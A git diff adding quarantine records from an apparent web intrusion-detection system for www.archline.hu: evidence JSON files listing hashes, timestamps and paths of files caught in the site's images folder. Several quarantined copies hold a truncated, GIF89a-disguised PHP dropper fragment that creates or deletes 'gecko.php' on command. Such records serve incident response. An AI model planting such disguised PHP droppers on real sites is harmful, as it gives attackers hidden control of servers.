+ "original_sha256": "c5a291910c1c5c3d846e1d6764610c5ce35b5916ede2f39fce7ba795b3ba4849", + "original_stat": { + "gid": 30037, + "mtime": 1783745302, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_ho2z5yid.pht.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.phtml.json b/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.phtml.json new file mode 100644 index 0000000..2502a03 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.phtml.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.phtml.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.phtml.json.evidence.json new file mode 100644 index 0000000..6e7acf0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.phtml.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3507", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_ho2z5yid.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.phtml.json)", + "original_sha256": "c5a291910c1c5c3d846e1d6764610c5ce35b5916ede2f39fce7ba795b3ba4849", + "original_stat": { + "gid": 30037, + "mtime": 1783745302, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_ho2z5yid.phtml.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.php.json b/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.php.json new file mode 100644 index 0000000..2502a03 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.php.json.evidence.json new file mode 100644 index 0000000..80366ba --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3442", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_jsvl1zfr.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.php.json)", + "original_sha256": "c5a291910c1c5c3d846e1d6764610c5ce35b5916ede2f39fce7ba795b3ba4849", + "original_stat": { + "gid": 30037, + "mtime": 1783745294, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_jsvl1zfr.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.php5.json b/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.php5.json new file mode 100644 index 0000000..2502a03 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.php5.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.php5.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.php5.json.evidence.json new file mode 100644 index 0000000..51bd7dd --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.php5.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3473", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_jsvl1zfr.php5.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.php5.json)", + "original_sha256": "c5a291910c1c5c3d846e1d6764610c5ce35b5916ede2f39fce7ba795b3ba4849", + "original_stat": { + "gid": 30037, + "mtime": 1783745297, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_jsvl1zfr.php5.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.pht.json b/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.pht.json new file mode 100644 index 0000000..2502a03 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.pht.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.pht.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.pht.json.evidence.json new file mode 100644 index 0000000..7087854 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.pht.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3460", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_jsvl1zfr.pht.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.pht.json)", + "original_sha256": "c5a291910c1c5c3d846e1d6764610c5ce35b5916ede2f39fce7ba795b3ba4849", + "original_stat": { + "gid": 30037, + "mtime": 1783745296, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_jsvl1zfr.pht.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.phtml.json b/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.phtml.json new file mode 100644 index 0000000..2502a03 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.phtml.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.phtml.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.phtml.json.evidence.json new file mode 100644 index 0000000..aa99975 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.phtml.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3464", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_jsvl1zfr.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_jsvl1zfr.phtml.json)", + "original_sha256": "c5a291910c1c5c3d846e1d6764610c5ce35b5916ede2f39fce7ba795b3ba4849", + "original_stat": { + "gid": 30037, + "mtime": 1783745296, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_jsvl1zfr.phtml.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.php.json b/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.php.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.php.json.evidence.json new file mode 100644 index 0000000..ff6bf25 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3450", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_pxw542fd.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.php.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783841987, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_pxw542fd.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.php5.json b/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.php5.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.php5.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.php5.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.php5.json.evidence.json new file mode 100644 index 0000000..426ca07 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.php5.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3480", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_pxw542fd.php5.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.php5.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783841989, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_pxw542fd.php5.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.pht.json b/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.pht.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.pht.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.pht.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.pht.json.evidence.json new file mode 100644 index 0000000..dccf6ae --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.pht.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3458", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_pxw542fd.pht.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.pht.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783841989, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_pxw542fd.pht.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.phtml.json b/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.phtml.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.phtml.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.phtml.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.phtml.json.evidence.json new file mode 100644 index 0000000..79b8e8b --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.phtml.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3479", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_pxw542fd.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_pxw542fd.phtml.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783841989, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_pxw542fd.phtml.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.php.json b/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.php.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.php.json.evidence.json new file mode 100644 index 0000000..f340b7a --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3446", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_r7txcnhr.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.php.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783841992, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_r7txcnhr.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.php5.json b/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.php5.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.php5.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.php5.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.php5.json.evidence.json new file mode 100644 index 0000000..172d841 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.php5.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3472", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_r7txcnhr.php5.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.php5.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783841994, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_r7txcnhr.php5.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.pht.json b/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.pht.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.pht.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.pht.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.pht.json.evidence.json new file mode 100644 index 0000000..aac1951 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.pht.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3447", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_r7txcnhr.pht.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.pht.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783841994, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_r7txcnhr.pht.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.phtml.json b/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.phtml.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.phtml.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.phtml.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.phtml.json.evidence.json new file mode 100644 index 0000000..9dfe370 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.phtml.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3497", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_r7txcnhr.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_r7txcnhr.phtml.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783841993, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_r7txcnhr.phtml.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.php.json b/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.php.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.php.json.evidence.json new file mode 100644 index 0000000..46bf0f0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3444", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_znv7fh9d.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.php.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783842127, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_znv7fh9d.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.php5.json b/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.php5.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.php5.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.php5.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.php5.json.evidence.json new file mode 100644 index 0000000..c740aaf --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.php5.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3487", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_znv7fh9d.php5.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.php5.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783842129, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_znv7fh9d.php5.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.pht.json b/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.pht.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.pht.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.pht.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.pht.json.evidence.json new file mode 100644 index 0000000..10d14d7 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.pht.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3448", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_znv7fh9d.pht.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.pht.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783842128, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_znv7fh9d.pht.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.phtml.json b/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.phtml.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.phtml.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.phtml.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.phtml.json.evidence.json new file mode 100644 index 0000000..6d19c01 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.phtml.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3478", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_znv7fh9d.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_znv7fh9d.phtml.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783842128, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_znv7fh9d.phtml.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/h3x_0qwoupg0.php.json b/var/www/hosting/archline.hu/www/images/h3x_0qwoupg0.php.json new file mode 100644 index 0000000..0e3a078 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/h3x_0qwoupg0.php.json @@ -0,0 +1,2 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/h3x_0qwoupg0.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/h3x_0qwoupg0.php.json.evidence.json new file mode 100644 index 0000000..b22bc64 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/h3x_0qwoupg0.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3441", + "log_excerpt": "[quarantine] www.archline.hu:images/h3x_0qwoupg0.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/h3x_0qwoupg0.php.json)", + "original_sha256": "9d603ee38848a230e8fb1f2a9065aa808992d2c603823ccfc34cdcb53475050c", + "original_stat": { + "gid": 30037, + "mtime": 1783864226, + "size": 333, + "uid": 20043 + }, + "rel_path": "images/h3x_0qwoupg0.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/h3x_gomp8oop.phtml.json b/var/www/hosting/archline.hu/www/images/h3x_gomp8oop.phtml.json new file mode 100644 index 0000000..59b5034 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/h3x_gomp8oop.phtml.json @@ -0,0 +1,11 @@ +GIF89a +');echo "x";} + elseif($c=="d"){@unlink("gecko.php");echo "d";} + else{echo "r";} +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/h3x_gomp8oop.phtml.json.evidence.json b/var/www/hosting/archline.hu/www/images/h3x_gomp8oop.phtml.json.evidence.json new file mode 100644 index 0000000..37f64c2 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/h3x_gomp8oop.phtml.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3457", + "log_excerpt": "[quarantine] www.archline.hu:images/h3x_gomp8oop.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/h3x_gomp8oop.phtml.json)", + "original_sha256": "cf2acdfb2ee5a9e2144d442180249bd76b5d6f4602a167e54410b08d46da150c", + "original_stat": { + "gid": 30037, + "mtime": 1783999804, + "size": 296, + "uid": 20043 + }, + "rel_path": "images/h3x_gomp8oop.phtml.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/h3x_h3ynctom.php.json b/var/www/hosting/archline.hu/www/images/h3x_h3ynctom.php.json new file mode 100644 index 0000000..59b5034 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/h3x_h3ynctom.php.json @@ -0,0 +1,11 @@ +GIF89a +');echo "x";} + elseif($c=="d"){@unlink("gecko.php");echo "d";} + else{echo "r";} +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/h3x_h3ynctom.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/h3x_h3ynctom.php.json.evidence.json new file mode 100644 index 0000000..a0fceab --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/h3x_h3ynctom.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3477", + "log_excerpt": "[quarantine] www.archline.hu:images/h3x_h3ynctom.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/h3x_h3ynctom.php.json)", + "original_sha256": "cf2acdfb2ee5a9e2144d442180249bd76b5d6f4602a167e54410b08d46da150c", + "original_stat": { + "gid": 30037, + "mtime": 1783864203, + "size": 296, + "uid": 20043 + }, + "rel_path": "images/h3x_h3ynctom.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/h3x_jkuvuk25.phtml.json b/var/www/hosting/archline.hu/www/images/h3x_jkuvuk25.phtml.json new file mode 100644 index 0000000..59b5034 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/h3x_jkuvuk25.phtml.json @@ -0,0 +1,11 @@ +GIF89a +');echo "x";} + elseif($c=="d"){@unlink("gecko.php");echo "d";} + else{echo "r";} +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/h3x_jkuvuk25.phtml.json.evidence.json b/var/www/hosting/archline.hu/www/images/h3x_jkuvuk25.phtml.json.evidence.json new file mode 100644 index 0000000..fa9cc2b --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/h3x_jkuvuk25.phtml.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3467", + "log_excerpt": "[quarantine] www.archline.hu:images/h3x_jkuvuk25.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/h3x_jkuvuk25.phtml.json)", + "original_sha256": "cf2acdfb2ee5a9e2144d442180249bd76b5d6f4602a167e54410b08d46da150c", + "original_stat": { + "gid": 30037, + "mtime": 1783864220, + "size": 296, + "uid": 20043 + }, + "rel_path": "images/h3x_jkuvuk25.phtml.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/h3x_n1bde7mb.php.json b/var/www/hosting/archline.hu/www/images/h3x_n1bde7mb.php.json new file mode 100644 index 0000000..0e3a078 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/h3x_n1bde7mb.php.json @@ -0,0 +1,2 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/h3x_n1bde7mb.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/h3x_n1bde7mb.php.json.evidence.json new file mode 100644 index 0000000..ba255a8 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/h3x_n1bde7mb.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3455", + "log_excerpt": "[quarantine] www.archline.hu:images/h3x_n1bde7mb.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/h3x_n1bde7mb.php.json)", + "original_sha256": "9d603ee38848a230e8fb1f2a9065aa808992d2c603823ccfc34cdcb53475050c", + "original_stat": { + "gid": 30037, + "mtime": 1783999810, + "size": 333, + "uid": 20043 + }, + "rel_path": "images/h3x_n1bde7mb.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/h3x_yb5mvz7l.php.json b/var/www/hosting/archline.hu/www/images/h3x_yb5mvz7l.php.json new file mode 100644 index 0000000..59b5034 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/h3x_yb5mvz7l.php.json @@ -0,0 +1,11 @@ +GIF89a +');echo "x";} + elseif($c=="d"){@unlink("gecko.php");echo "d";} + else{echo "r";} +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/h3x_yb5mvz7l.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/h3x_yb5mvz7l.php.json.evidence.json new file mode 100644 index 0000000..acdbf6c --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/h3x_yb5mvz7l.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3476", + "log_excerpt": "[quarantine] www.archline.hu:images/h3x_yb5mvz7l.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/h3x_yb5mvz7l.php.json)", + "original_sha256": "cf2acdfb2ee5a9e2144d442180249bd76b5d6f4602a167e54410b08d46da150c", + "original_stat": { + "gid": 30037, + "mtime": 1783999799, + "size": 296, + "uid": 20043 + }, + "rel_path": "images/h3x_yb5mvz7l.php.json", + "result": "quarantined", 